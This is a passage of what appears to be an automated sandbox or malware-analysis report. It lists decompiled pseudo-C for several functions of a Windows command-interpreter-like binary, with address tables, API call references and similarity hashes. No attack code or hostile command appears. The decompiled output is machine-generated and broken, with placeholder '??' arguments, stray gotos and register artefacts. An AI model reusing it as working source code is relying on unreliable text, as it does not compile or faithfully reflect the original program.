						_t27 = _t27 + 2;
					} while (_t48 != 0);
					if(_t27 == _t59) {
						goto L36;
					}
					_push(_t44 + 4);
					_push(_t60);
					L13:
					return E4A551730();
				}
				_t65 =  *(_t10 + 0x3c);
				if(_t65 == 0) {
					goto L22;
				}
				_t32 =  *_t65 & 0x0000ffff;
				if(_t32 == 0) {
					goto L22;
				}
				while(_t32 <= 0x20) {
					_t65 =  &(_t65[0]);
					_t32 =  *_t65 & 0x0000ffff;
					if(_t32 != 0) {
						continue;
					}
					break;
				}
				if( *_t65 == 0) {
					goto L22;
				}
				_t61 = __imp___wcsnicmp;
				_t46 = 2;
				_push(_t46);
				_push(0x4a574650);
				_push(_t65);
				if( *_t61() == 0) {
					return E4A55EC28(_t47,  &(_t65[1]));
				}
				_push(_t46);
				_push(0x4a574658);
				_push(_t65);
				if( *_t61() == 0) {
					return E4A56CB35(_t56, _t61,  &(_t65[1]),  &(_t65[1]));
				}
				_t37 =  *_t65 & 0x0000ffff;
				if(_t37 == 0x2f) {
					goto L36;
				}
				if(_t37 == 0x22) {
					while(1) {
						_t65 = _t65 + _t46;
						_t38 =  *_t65 & 0x0000ffff;
						if(_t38 == 0) {
							break;
						}
						if(_t38 > 0x20) {
							break;
						}
					}
					_t39 = wcsrchr(_t65, 0x22);
					_pop(_t48);
					if(_t39 != 0) {
						_t48 = 0;
						 *_t39 = 0;
					}
				}
				if( *_t65 == 0x3d) {
					goto L36;
				}
				_t40 = wcschr(_t65, 0x3d);
				_pop(_t54);
				if(_t40 == 0) {
					return E4A56C9D2(_t54, _t65);
				}
				 *_t40 = 0;
				_push( &(_t40[0]));
				_push(_t65);
				goto L13;
			}




























                                0x4a555a56
                                0x4a555a62
                                0x4a555a68
                                0x4a5654cf
                                0x4a5654d1
                                0x4a5654d6
                                0x4a5654b0
                                0x00000000
                                0x4a5654b6
                                0x4a5654d8
                                0x4a5654da
                                0x4a5654da
                                0x4a5654dc
                                0x4a5654dc
                                0x4a5654df
                                0x4a5654df
                                0x4a5654e3
                                0x4a5654e4
                                0x4a5654ed
                                0x4a5654f1
                                0x4a5654f2
                                0x4a5654fa
                                0x4a56554d
                                0x4a56554d
                                0x4a56554f
                                0x4a565554
                                0x00000000
                                0x4a56555d
                                0x4a565502
                                0x4a565508
                                0x00000000
                                0x00000000
                                0x4a56550a
                                0x4a56550c
                                0x4a56550c
                                0x4a56550f
                                0x4a56550f
                                0x4a565513
                                0x4a565514
                                0x4a565529
                                0x4a56552e
                                0x4a565530
                                0x4a565530
                                0x4a565533
                                0x4a565533
                                0x4a565537
                                0x4a565538
                                0x4a565541
                                0x00000000
                                0x00000000
                                0x4a565546
                                0x4a565547
                                0x4a555b0e
                                0x00000000
                                0x4a555b0e
                                0x4a555a6e
                                0x4a555a73
                                0x00000000
                                0x00000000
                                0x4a555a79
                                0x4a555a7f
                                0x00000000
                                0x00000000
                                0x4a555a85
                                0x4a555a8c
                                0x4a555a8d
                                0x4a555a93
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a555a93
                                0x4a555a99
                                0x00000000
                                0x00000000
                                0x4a555a9f
                                0x4a555aa7
                                0x4a555aa8
                                0x4a555aa9
                                0x4a555aae
                                0x4a555ab6
                                0x00000000
                                0x4a55ec19
                                0x4a555abc
                                0x4a555abd
                                0x4a555ac2
                                0x4a555aca
                                0x00000000
                                0x4a56546e
                                0x4a555ad0
                                0x4a555ad7
                                0x00000000
                                0x00000000
                                0x4a555ae1
                                0x4a56547e
                                0x4a56547e
                                0x4a565480
                                0x4a565486
                                0x00000000
                                0x00000000
                                0x4a56547c
                                0x00000000
                                0x00000000
                                0x4a56547c
                                0x4a56548b
                                0x4a565492
                                0x4a565495
                                0x4a56549b
                                0x4a56549d
                                0x4a56549d
                                0x4a565495
                                0x4a555aeb
                                0x00000000
                                0x00000000
                                0x4a555af4
                                0x4a555afb
                                0x4a555afe
                                0x00000000
                                0x4a5654a6
                                0x4a555b06
                                0x4a555b0c
                                0x4a555b0d
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsnicmp$wcschr
                                • String ID:
                                • API String ID: 3270668897-0
                                • Opcode ID: 344df0fa45872d6714c13914f591187510698c0ee27bd368d7cdc9703f1a9fb8
                                • Instruction ID: a34719bc53081ff6da9c9962b4770ff1bb8793e0dbbcb2c34edbef82778ab536
                                • Opcode Fuzzy Hash: 344df0fa45872d6714c13914f591187510698c0ee27bd368d7cdc9703f1a9fb8
                                • Instruction Fuzzy Hash: E7419F36591112A6D3222B24CF04BB73B68DF79366B420157ED8AEF19DFB51CA42C3A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55B0F9, Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                Download Yara Rule
                                C-Code - Quality: 28%
                                			E4A55B0F9(int __ebx, void* __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				void* __esi;
				void* _t28;
				intOrPtr _t31;
				void* _t37;
				int _t38;
				void* _t41;
				void* _t42;
				void* _t44;
				void* _t54;
				void* _t58;
				intOrPtr _t63;
				signed int _t67;
				signed int _t71;

				_t58 = __edx;
				_t49 = __ebx;
				_t63 = _a4;
				if( *(_t63 + 8) != 0) {
					_push(__ebx);
					_push(__edi);
					if(E4A554490(_t28, 1) != 0) {
						_t60 =  *(_t63 + 0x10);
						_t31 = _t60 +  *(_t63 + 8) * 2;
						_v12 = _t31;
						while(_t60 < _t31) {
							_t49 = _t60;
							if(_t60 >= _t31) {
								goto L6;
							} else {
								while( *_t49 != 0x2022) {
									_t49 = _t49 + 2;
									if(_t49 < _t31) {
										continue;
									}
									break;
								}
								if(_t49 == _t60) {
									goto L17;
								} else {
									_t44 =  &_v8;
									_t71 = _t49 - _t60 >> 1;
									__imp___get_osfhandle(_t60, _t71, _t44, 0);
									_t54 = 1;
									if(WriteConsoleW(_t44, ??, ??, ??, ??) == 0 || _v8 != _t71) {
										L25:
										_t63 = _a4;
										goto L26;
									} else {
										_t63 = _a4;
										_t60 = _t49;
										L17:
										while(_t49 < _v12) {
											if( *_t49 == 0x2022) {
												_t49 = _t49 + 2;
												continue;
											}
											break;
										}
										if(_t49 == _t60) {
											L22:
											_t31 = _v12;
											continue;
										} else {
											E4A56EA77(_t63);
											_t37 =  &_v8;
											_t67 = _t49 - _t60 >> 1;
											__imp___get_osfhandle(_t60, _t67, _t37, 0);
											_t54 = 1;
											_t38 = WriteConsoleW(_t37, ??, ??, ??, ??);
											_t60 = _t38;
											_t39 = E4A551605();
											if(_t38 == 0 || _v8 != _t67) {
												goto L25;
											} else {
												_t63 = _a4;
												_t60 = _t49;
												goto L22;
											}
										}
									}
								}
							}
							goto L33;
						}
						goto L6;
					} else {
						if(E4A55453E( *(_t63 + 8) +  *(_t63 + 8), 1,  *(_t63 + 0x10),  *(_t63 + 8) +  *(_t63 + 8),  &_v16) == 0) {
							L26:
							if(E4A553B03(_t39, _t54, 1) == 0) {
								_t41 = E4A556BEA(_t40, 1);
								if(_t41 == 0) {
									_push(_t41);
									_push(0x70);
									goto L30;
								}
							} else {
								_push(0);
								_push(0x1d);
								L30:
								E4A556D44(_t54);
								_pop(_t54);
							}
							_t42 = E4A56FCA6(_t49, _t54, _t58, _t60, _t63);
							asm("int3");
							_t28 = _t42 + 1;
							return _t28;
						} else {
							_t48 =  *(_t63 + 8);
							_t39 =  *(_t63 + 8) + _t48;
							if(_v16 <  *(_t63 + 8) + _t48) {
								goto L26;
							} else {
								L6:
								goto L2;
							}
						}
					}
				} else {
					L2:
					 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + E4A55A8A9(_t63,  *(_t63 + 0x10));
					 *( *(_t63 + 0x10)) = 0;
					 *(_t63 + 8) =  *(_t63 + 8) & 0;
					return 0;
				}
				L33:
			}



















                                0x4a55b0f9
                                0x4a55b0f9
                                0x4a55b102
                                0x4a55b109
                                0x4a56259d
                                0x4a56259e
                                0x4a5625a8
                                0x4a567a01
                                0x4a567a07
                                0x4a567a0a
                                0x4a567aaf
                                0x4a567a12
                                0x4a567a16
                                0x00000000
                                0x4a567a1c
                                0x4a567a1c
                                0x4a567a27
                                0x4a567a2a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a567a2a
                                0x4a567a2e
                                0x00000000
                                0x4a567a30
                                0x4a567a34
                                0x4a567a3a
                                0x4a567a40
                                0x4a567a46
                                0x4a567a50
                                0x4a567abc
                                0x4a567abc
                                0x00000000
                                0x4a567a57
                                0x4a567a57
                                0x4a567a5a
                                0x00000000
                                0x4a567a6a
                                0x4a567a66
                                0x4a567a69
                                0x00000000
                                0x4a567a69
                                0x00000000
                                0x4a567a66
                                0x4a567a71
                                0x4a567aac
                                0x4a567aac
                                0x00000000
                                0x4a567a73
                                0x4a567a74
                                0x4a567a7d
                                0x4a567a83
                                0x4a567a89
                                0x4a567a8f
                                0x4a567a91
                                0x4a567a97
                                0x4a567a99
                                0x4a567aa0
                                0x00000000
                                0x4a567aa7
                                0x4a567aa7
                                0x4a567aaa
                                0x00000000
                                0x4a567aaa
                                0x4a567aa0
                                0x4a567a71
                                0x4a567a50
                                0x4a567a2e
                                0x00000000
                                0x4a567a16
                                0x00000000
                                0x4a5625ae
                                0x4a5625c4
                                0x4a567abf
                                0x4a567ac8
                                0x4a567ad2
                                0x4a567ad9
                                0x4a567adb
                                0x4a567adc
                                0x00000000
                                0x4a567adc
                                0x4a567aca
                                0x4a567aca
                                0x4a567acc
                                0x4a567ade
                                0x4a567ade
                                0x4a567ae4
                                0x4a567ae4
                                0x4a567ae5
                                0x4a567aea
                                0x4a567aeb
                                0x4a55ab93
                                0x4a5625ca
                                0x4a5625ca
                                0x4a5625cd
                                0x4a5625d2
                                0x00000000
                                0x4a5625d8
                                0x4a5625d8
                                0x00000000
                                0x4a5625d9
                                0x4a5625d2
                                0x4a5625c4
                                0x4a55b10f
                                0x4a55b10f
                                0x4a55b118
                                0x4a55b120
                                0x4a55b123
                                0x4a55b12a
                                0x4a55b12a
                                0x00000000

                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4e08205e2104c0ea757b2684c6299f92e33a1c719800e5a05374a85913ddd3f
                                • Instruction ID: acd9fee82e59e11d1f9b701b0dea0f31d1dc0d1da281dfaf140dce51d6918df3
                                • Opcode Fuzzy Hash: b4e08205e2104c0ea757b2684c6299f92e33a1c719800e5a05374a85913ddd3f
                                • Instruction Fuzzy Hash: 7441FB71A00311AFD7219A74CB48B9E7BB9EF40764F15051AE90EEB584E670EF80C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A552FAF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 97%
                                			E4A552FAF(void* __ecx, WCHAR* _a4, long _a8, WCHAR* _a12) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				WCHAR* _t22;
				intOrPtr* _t28;
				signed int _t30;
				short* _t31;
				WCHAR* _t33;
				int _t36;
				intOrPtr* _t42;
				void* _t45;
				short _t49;
				intOrPtr _t50;
				short _t51;
				short _t53;
				intOrPtr _t54;
				short* _t55;
				void* _t57;
				void* _t58;
				WCHAR* _t60;
				long _t62;
				WCHAR* _t66;
				intOrPtr* _t67;
				short* _t69;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t60 = _a12;
				_t22 = _t60;
				_t4 =  &(_t22[1]); // 0x26
				_t55 = _t4;
				_t45 = 2;
				do {
					_t49 =  *_t22;
					_t22 = _t22 + _t45;
				} while (_t49 != 0);
				E4A55185A(_t60, (_t22 - _t55 >> 1) + 1, E4A552598(_t49, _t60));
				_t56 =  *_t60 & 0x0000ffff;
				if(( *_t60 & 0x0000ffff) == 0) {
					_t66 = _a4;
					E4A552C56(_t45, _t56, _t60, _t66, _a8, 0);
					_t67 = _t66 + 4;
					_t28 = _t67;
					_t13 = _t28 + 2; // -2
					_t57 = _t13;
					do {
						_t50 =  *_t28;
						_t28 = _t28 + _t45;
					} while (_t50 != 0);
					_t30 = _t28 - _t57 >> 1;
					if(_t30 < 0x101) {
						if(_t30 != 1) {
							goto L19;
						} else {
						}
					} else {
						 *0x4a574128 = 3;
						goto L21;
					}
				} else {
					_t33 = _t60;
					_t5 =  &(_t33[1]); // 0x26
					_t69 = _t5;
					do {
						_t53 =  *_t33;
						_t33 = _t33 + _t45;
					} while (_t53 != 0);
					if(_t33 - _t69 >> 1 == _t45) {
						if(_t60[1] != 0x3a) {
							goto L6;
						} else {
							_t67 = _a4;
							E4A552C56(_t45, _t56, _t60, _t67, _a8, _t56);
							_t42 = _t67;
							_t17 = _t42 + 2; // 0x2
							_t58 = _t17;
							do {
								_t54 =  *_t42;
								_t42 = _t42 + _t45;
							} while (_t54 != 0);
							_t30 = _t42 - _t58 >> 1;
							if(_t30 > 3) {
								L19:
								_t51 =  *0x4a590664; // 0x5c
								_t31 = _t67 + _t30 * 2;
								 *_t31 = _t51;
								 *((short*)(_t31 + 2)) = 0;
							}
						}
					} else {
						L6:
						_t36 = SetErrorMode(0);
						SetErrorMode(1);
						_t62 = GetFullPathNameW(_t60, _a8, _a4,  &_a12);
						SetErrorMode(_t36);
						if(_t62 == 0 || _t62 > _a8) {
							 *0x4a574128 = 0xce;
							L21:
							_v8 = 1;
						}
					}
				}
				return _v8;
			}



























                                0x4a552fb4
                                0x4a552fb5
                                0x4a552fbc
                                0x4a552fbf
                                0x4a552fc3
                                0x4a552fc3
                                0x4a552fc6
                                0x4a552fc7
                                0x4a552fc7
                                0x4a552fca
                                0x4a552fcc
                                0x4a552fe1
                                0x4a552fe6
                                0x4a552fec
                                0x4a56a00a
                                0x4a56a013
                                0x4a56a018
                                0x4a56a01b
                                0x4a56a01d
                                0x4a56a01d
                                0x4a56a020
                                0x4a56a020
                                0x4a56a023
                                0x4a56a025
                                0x4a56a02c
                                0x4a56a033
                                0x4a56a044
                                0x00000000
                                0x00000000
                                0x4a56a046
                                0x4a56a035
                                0x4a56a035
                                0x00000000
                                0x4a56a035
                                0x4a552ff2
                                0x4a552ff2
                                0x4a552ff4
                                0x4a552ff4
                                0x4a552ff7
                                0x4a552ff7
                                0x4a552ffa
                                0x4a552ffc
                                0x4a553007
                                0x4a56a050
                                0x00000000
                                0x4a56a056
                                0x4a56a056
                                0x4a56a05e
                                0x4a56a063
                                0x4a56a065
                                0x4a56a065
                                0x4a56a068
                                0x4a56a068
                                0x4a56a06b
                                0x4a56a06d
                                0x4a56a074
                                0x4a56a079
                                0x4a56a07f
                                0x4a56a07f
                                0x4a56a086
                                0x4a56a089
                                0x4a56a08e
                                0x4a56a08e
                                0x4a56a079
                                0x4a55300d
                                0x4a55300d
                                0x4a553015
                                0x4a55301b
                                0x4a55302f
                                0x4a553031
                                0x4a553035
                                0x4a56a097
                                0x4a56a0a1
                                0x4a56a0a1
                                0x4a56a0a1
                                0x4a553035
                                0x4a553007
                                0x4a55304b

                                APIs
                                • SetErrorMode.KERNEL32(00000000,00000024,00000025,00000000,00000024,00000104,00000000,?,?,?,4A5596D2,?,00000104,?,00000000,00000104), ref: 4A553015
                                • SetErrorMode.KERNEL32(00000001,?,?,4A5596D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024,00000000,00000000), ref: 4A55301B
                                • GetFullPathNameW.KERNEL32(00000024,00000000,00000000,00000024,?,?,4A5596D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024), ref: 4A553028
                                • SetErrorMode.KERNEL32(00000000,?,?,4A5596D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024,00000000,00000000), ref: 4A553031
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorMode$FullNamePath
                                • String ID:
                                • API String ID: 268959451-0
                                • Opcode ID: 088d80df3e17bf2129a4df18c212a6b0e7fc8b00cff69827fcae952c139aaa37
                                • Instruction ID: 8f269bfb8e9848c6c556434c46d4c1a76cf6382e5464ad7b7231f6b4b1d88705
                                • Opcode Fuzzy Hash: 088d80df3e17bf2129a4df18c212a6b0e7fc8b00cff69827fcae952c139aaa37
                                • Instruction Fuzzy Hash: DD314836200206EBDB009F58CE55ADE7BB8EF85770F068416EA08DF218E375EB50C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5566BD, Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                Download Yara Rule
                                C-Code - Quality: 23%
                                			E4A5566BD(short* __eax, void* __edx, void* __edi) {
				void* __ebx;
				void* __esi;
				short* _t42;
				short* _t43;
				void* _t44;
				void* _t49;
				intOrPtr _t52;
				void* _t55;
				void* _t58;
				void* _t71;
				int _t73;
				void* _t74;
				void* _t80;
				int _t83;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				short* _t90;
				void* _t92;
				intOrPtr* _t93;
				int _t104;
				signed int _t106;

				L0:
				while(1) {
					L0:
					_t87 = __edi;
					_t86 = __edx;
					_t42 = __eax;
					if(__eax == 0x4a588640) {
						goto L10;
					}
					L8:
					__eax = __eax - 1;
					__eax = __eax - 1;
					L9:
					 *((intOrPtr*)(_t106 - 0x210)) = _t42;
					if( *_t42 != 0xa) {
						continue;
					}
					L10:
					if( *_t42 != 0x3a) {
						 *((intOrPtr*)(_t106 - 0x210)) = _t42;
					}
					L12:
					_t43 = E4A552B0D(_t42, _t73);
					 *((intOrPtr*)(_t106 - 0x224)) = _t43;
					if( *_t43 == 0x3a) {
						L3:
						_t44 = E4A5518EB( *((intOrPtr*)(_t106 - 0x210)), 0xa);
						_t89 = _t44;
						if(_t89 == _t73) {
							L27:
							__imp___get_osfhandle(1);
							if(SetFilePointer(_t44,  *(_t106 - 0x208), _t73, _t73) ==  *((intOrPtr*)(_t106 - 0x21c))) {
								goto L4;
							}
							L28:
							L30:
							_t83 =  *(_t106 - 0x20c);
							if(_t83 == 0x200) {
								goto L4;
							}
							L31:
							_t104 = _t83 - ( *((intOrPtr*)(_t106 - 0x210)) - 0x4a588640 >> 1);
							_t71 = E4A55661C();
							if(_t71 != 0) {
								_t71 = WideCharToMultiByte( *0x4a5741b8, _t73, 0x4a588640, _t104, _t73, _t73, _t73, _t73);
								_t104 = _t71;
							}
							L33:
							__imp___get_osfhandle(1);
							_t50 = SetFilePointer(_t71,  *(_t106 - 0x208),  ~_t104, _t73);
							L14:
							if( *0x4a5740b8 == 1) {
								L1:
								E4A553AB3( *(_t106 - 0x208));
								_t52 =  *((intOrPtr*)(_t106 - 0x218));
								_pop(_t88);
								_pop(_t92);
								_pop(_t74);
								return E4A5513A9(_t52, _t74,  *(_t106 - 4) ^ _t106, _t86, _t88, _t92);
							} else {
								goto L15;
							}
							while(1) {
								L15:
								E4A554B2A(_t50);
								_t93 = __imp___get_osfhandle;
								_t55 =  *_t93( *(_t106 - 0x208), _t73, _t73, 1);
								_pop(_t80);
								_t56 = SetFilePointer(_t55, ??, ??, ??);
								 *(_t87 + 8) = _t56;
								if(_t56 >=  *((intOrPtr*)(_t106 - 0x228)) &&  *(_t106 - 0x214) == _t73) {
								}
								L24:
								if( *(_t106 - 0x20c) != _t73) {
									L29:
									E4A5557F4(_t56, _t87);
									L40:
									 *0x4a5740b4 =  *((intOrPtr*)(_t87 + 0x110));
									E4A556D44(_t80, 0x400023ab, 1, _t106 - 0x104);
									 *((intOrPtr*)(_t106 - 0x218)) = 1;
									goto L1;
								}
								L25:
								if( *(_t106 - 0x214) == _t73) {
									goto L29;
								}
								L26:
								_t50 = SetFilePointer( *_t93(_t73),  *(_t106 - 0x208), _t73, _t73);
								 *(_t106 - 0x214) = _t73;
								while(1) {
									L15:
									E4A554B2A(_t50);
									_t93 = __imp___get_osfhandle;
									_t55 =  *_t93( *(_t106 - 0x208), _t73, _t73, 1);
									_pop(_t80);
									_t56 = SetFilePointer(_t55, ??, ??, ??);
									 *(_t87 + 8) = _t56;
									if(_t56 >=  *((intOrPtr*)(_t106 - 0x228)) &&  *(_t106 - 0x214) == _t73) {
									}
									goto L17;
								}
								goto L24;
								L17:
								_t58 =  *_t93( *(_t106 - 0x208), 0x4a588640, 0x200, _t106 - 0x20c);
								_pop(_t80);
								_push(_t58);
								if(E4A5567D3() == 0) {
									goto L24;
								}
								L18:
								_t56 =  *(_t106 - 0x20c);
								if(_t56 == _t73) {
									goto L25;
								}
								L19:
								if(_t56 == 0xffffffff ||  *0x4a588640 == _t73 ||  *((intOrPtr*)(_t106 - 0x104)) == _t73) {
									goto L24;
								} else {
									L22:
									0x4a588640[_t56] = 0;
									_t90 = E4A5518EB(0x4a588640, 0x3a);
									if(_t90 == _t73) {
										continue;
									}
									L23:
									_t42 = _t90;
									_t89 = _t90 + 2;
									goto L9;
								}
							}
						}
						L4:
						E4A55654D( *((intOrPtr*)(_t106 - 0x224)), _t106 - 0x204, 0x80, _t73);
						_t49 = _t106 - 0x104;
						__imp___wcsicmp(_t49, _t106 - 0x204);
						if(_t49 != 0) {
							goto L13;
						}
						L5:
						 *0x4a5740b8 =  *( *((intOrPtr*)(_t106 - 0x220)) + 0x40) & 0x00000001;
						_t50 = E4A55661C();
						if(_t89 == _t73) {
							L34:
							if(_t50 == 0) {
								L36:
								_t50 =  *(_t106 - 0x20c);
								L39:
								 *(_t87 + 8) =  *(_t87 + 8) + _t50;
								goto L14;
							}
							L35:
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push( *(_t106 - 0x20c));
							_push(0x4a588640);
							L38:
							_t50 = WideCharToMultiByte( *0x4a5741b8, _t73, ??, ??, ??, ??, ??, ??);
							goto L39;
						}
						L6:
						if(_t50 != 0) {
							L37:
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push(_t73);
							_push(_t89 - 0x4a588640 + 2 >> 1);
							_push(0x4a588640);
							goto L38;
						}
						L7:
						 *(_t87 + 8) =  *(_t87 + 8) + (_t89 - 0x4a588640 + 2 >> 1);
						goto L14;
					}
					L13:
					_t90 = E4A5518EB(_t89, 0x3a);
					if(_t90 != _t73) {
						goto L23;
					}
					goto L14;
				}
			}


























                                0x4a5566bd
                                0x4a5566bd
                                0x4a5566bd
                                0x4a5566bd
                                0x4a5566bd
                                0x4a5566bd
                                0x4a5566c2
                                0x00000000
                                0x00000000
                                0x4a5566c4
                                0x4a5566c4
                                0x4a5566c5
                                0x4a5566c6
                                0x4a5566ca
                                0x4a5566d0
                                0x00000000
                                0x00000000
                                0x4a5566d2
                                0x4a5566d6
                                0x4a5566da
                                0x4a5566da
                                0x4a5566e0
                                0x4a5566e2
                                0x4a5566eb
                                0x4a5566f1
                                0x4a556640
                                0x4a556648
                                0x4a55664d
                                0x4a556651
                                0x4a5601ad
                                0x4a5601b7
                                0x4a5601cb
                                0x00000000
                                0x00000000
                                0x4a5601d1
                                0x4a564720
                                0x4a564720
                                0x4a56472c
                                0x00000000
                                0x00000000
                                0x4a564732
                                0x4a564741
                                0x4a564743
                                0x4a56474a
                                0x4a56475d
                                0x4a564763
                                0x4a564763
                                0x4a564765
                                0x4a564771
                                0x4a564779
                                0x4a556709
                                0x4a556710
                                0x4a556526
                                0x4a55652c
                                0x4a556531
                                0x4a55653a
                                0x4a55653b
                                0x4a55653e
                                0x4a556545
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556716
                                0x4a556716
                                0x4a556716
                                0x4a55671b
                                0x4a55672b
                                0x4a55672d
                                0x4a55672f
                                0x4a55673b
                                0x4a55673e
                                0x4a55673e
                                0x4a55f3fa
                                0x4a55f400
                                0x4a5601de
                                0x4a5601df
                                0x4a5647c7
                                0x4a5647cd
                                0x4a5647e2
                                0x4a5647ea
                                0x00000000
                                0x4a5647ea
                                0x4a55f406
                                0x4a55f40c
                                0x00000000
                                0x00000000
                                0x4a55f412
                                0x4a55f41f
                                0x4a55f425
                                0x4a556716
                                0x4a556716
                                0x4a556716
                                0x4a55671b
                                0x4a55672b
                                0x4a55672d
                                0x4a55672f
                                0x4a55673b
                                0x4a55673e
                                0x4a55673e
                                0x00000000
                                0x4a55673e
                                0x00000000
                                0x4a55674c
                                0x4a556763
                                0x4a556765
                                0x4a556766
                                0x4a55676e
                                0x00000000
                                0x00000000
                                0x4a556774
                                0x4a556774
                                0x4a55677c
                                0x00000000
                                0x00000000
                                0x4a556782
                                0x4a556785
                                0x00000000
                                0x4a5567a5
                                0x4a5567a5
                                0x4a5567ae
                                0x4a5567bb
                                0x4a5567bf
                                0x00000000
                                0x00000000
                                0x4a5567c5
                                0x4a5567c5
                                0x4a5567c8
                                0x00000000
                                0x4a5567c8
                                0x4a556785
                                0x4a556716
                                0x4a556657
                                0x4a55666a
                                0x4a556676
                                0x4a55667d
                                0x4a556687
                                0x00000000
                                0x00000000
                                0x4a556689
                                0x4a556694
                                0x4a556699
                                0x4a5566a0
                                0x4a564784
                                0x4a564786
                                0x4a564799
                                0x4a564799
                                0x4a5647bf
                                0x4a5647bf
                                0x00000000
                                0x4a5647bf
                                0x4a564788
                                0x4a564788
                                0x4a564789
                                0x4a56478a
                                0x4a56478b
                                0x4a56478c
                                0x4a564792
                                0x4a5647b2
                                0x4a5647b9
                                0x00000000
                                0x4a5647b9
                                0x4a5566a6
                                0x4a5566a8
                                0x4a5647a1
                                0x4a5647a1
                                0x4a5647a9
                                0x4a5647ab
                                0x4a5647ad
                                0x4a5647b0
                                0x4a5647b1
                                0x00000000
                                0x4a5647b1
                                0x4a5566ae
                                0x4a5566b8
                                0x00000000
                                0x4a5566b8
                                0x4a5566f7
                                0x4a5566ff
                                0x4a556703
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a556703

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _get_osfhandle$FilePointer
                                • String ID:
                                • API String ID: 2479667682-0
                                • Opcode ID: 77ceaa7ad00691daf0eabfa7f445448df24a536691b602f983d92914c8d845d5
                                • Instruction ID: 88636d62854887811e8057cd24c4900293c824e33aa2bcf6e900662b2e6d18b5
                                • Opcode Fuzzy Hash: 77ceaa7ad00691daf0eabfa7f445448df24a536691b602f983d92914c8d845d5
                                • Instruction Fuzzy Hash: 823103B1C002B5ABEF216B60CF886A87AB8EF01394F060597D516EB4ACD7708DC5CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55D926, Relevance: 6.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 43%
                                			E4A55D926(void* __ecx, wchar_t* _a4) {
				wchar_t* _v8;
				long _t29;
				int _t30;
				signed int _t31;
				long _t33;
				signed int _t39;
				wchar_t* _t50;
				void* _t52;
				void* _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_t50 = _a4;
				_t33 = wcstol( *(_t50 + 0x38),  &_a4, 0);
				_t29 = wcstol( *(_t50 + 0x3c),  &_v8, 0);
				if( *_a4 != 0 ||  *_v8 != 0) {
					_push( *(_t50 + 0x3c));
					_push( *(_t50 + 0x38));
					if(( *(_t50 + 0x40) & 0x00000002) != 0) {
						_t30 = lstrcmpiW();
					} else {
						_t30 = lstrcmpW();
					}
				} else {
					_t30 = _t33 - _t29;
				}
				_t52 =  *((intOrPtr*)(_t50 + 0x44)) - 1;
				if(_t52 != 0) {
					_t53 = _t52 - 1;
					if(_t53 == 0) {
						_t39 = 0 | _t30 != 0x00000000;
						goto L5;
					}
					_t55 = _t53 - 1;
					if(_t55 == 0) {
						_t39 = 0 | _t30 < 0x00000000;
						goto L5;
					}
					_t56 = _t55 - 1;
					if(_t56 == 0) {
						_t39 = 0 | _t30 <= 0x00000000;
						goto L5;
					}
					_t57 = _t56 - 1;
					if(_t57 != 0) {
						if(_t57 != 1) {
							_t31 = 0;
							goto L6;
						}
						_t39 = 0 | _t30 >= 0x00000000;
						goto L5;
					}
					_t39 = 0 | _t30 > 0x00000000;
					goto L5;
				} else {
					_t39 = 0 | _t30 == 0x00000000;
					L5:
					_t31 = _t39;
					L6:
					return _t31;
				}
			}















                                0x4a55d92e
                                0x4a55d943
                                0x4a55d94e
                                0x4a55d95a
                                0x4a55db9f
                                0x4a55dba2
                                0x4a55dba5
                                0x4a564097
                                0x4a55dbab
                                0x4a55dbab
                                0x4a55dbab
                                0x4a55d96d
                                0x4a55d96f
                                0x4a55d96f
                                0x4a55d974
                                0x4a55d975
                                0x4a55d987
                                0x4a55d988
                                0x4a55d9ac
                                0x00000000
                                0x4a55d9ac
                                0x4a55d98a
                                0x4a55d98b
                                0x4a55f3e6
                                0x00000000
                                0x4a55f3e6
                                0x4a55d991
                                0x4a55d992
                                0x4a55f45a
                                0x00000000
                                0x4a55f45a
                                0x4a55d998
                                0x4a55d999
                                0x4a55dbb7
                                0x4a5640a2
                                0x00000000
                                0x4a5640a2
                                0x4a55dbc1
                                0x00000000
                                0x4a55dbc1
                                0x4a55d9a3
                                0x00000000
                                0x4a55d977
                                0x4a55d97b
                                0x4a55d97e
                                0x4a55d97e
                                0x4a55d980
                                0x4a55d984
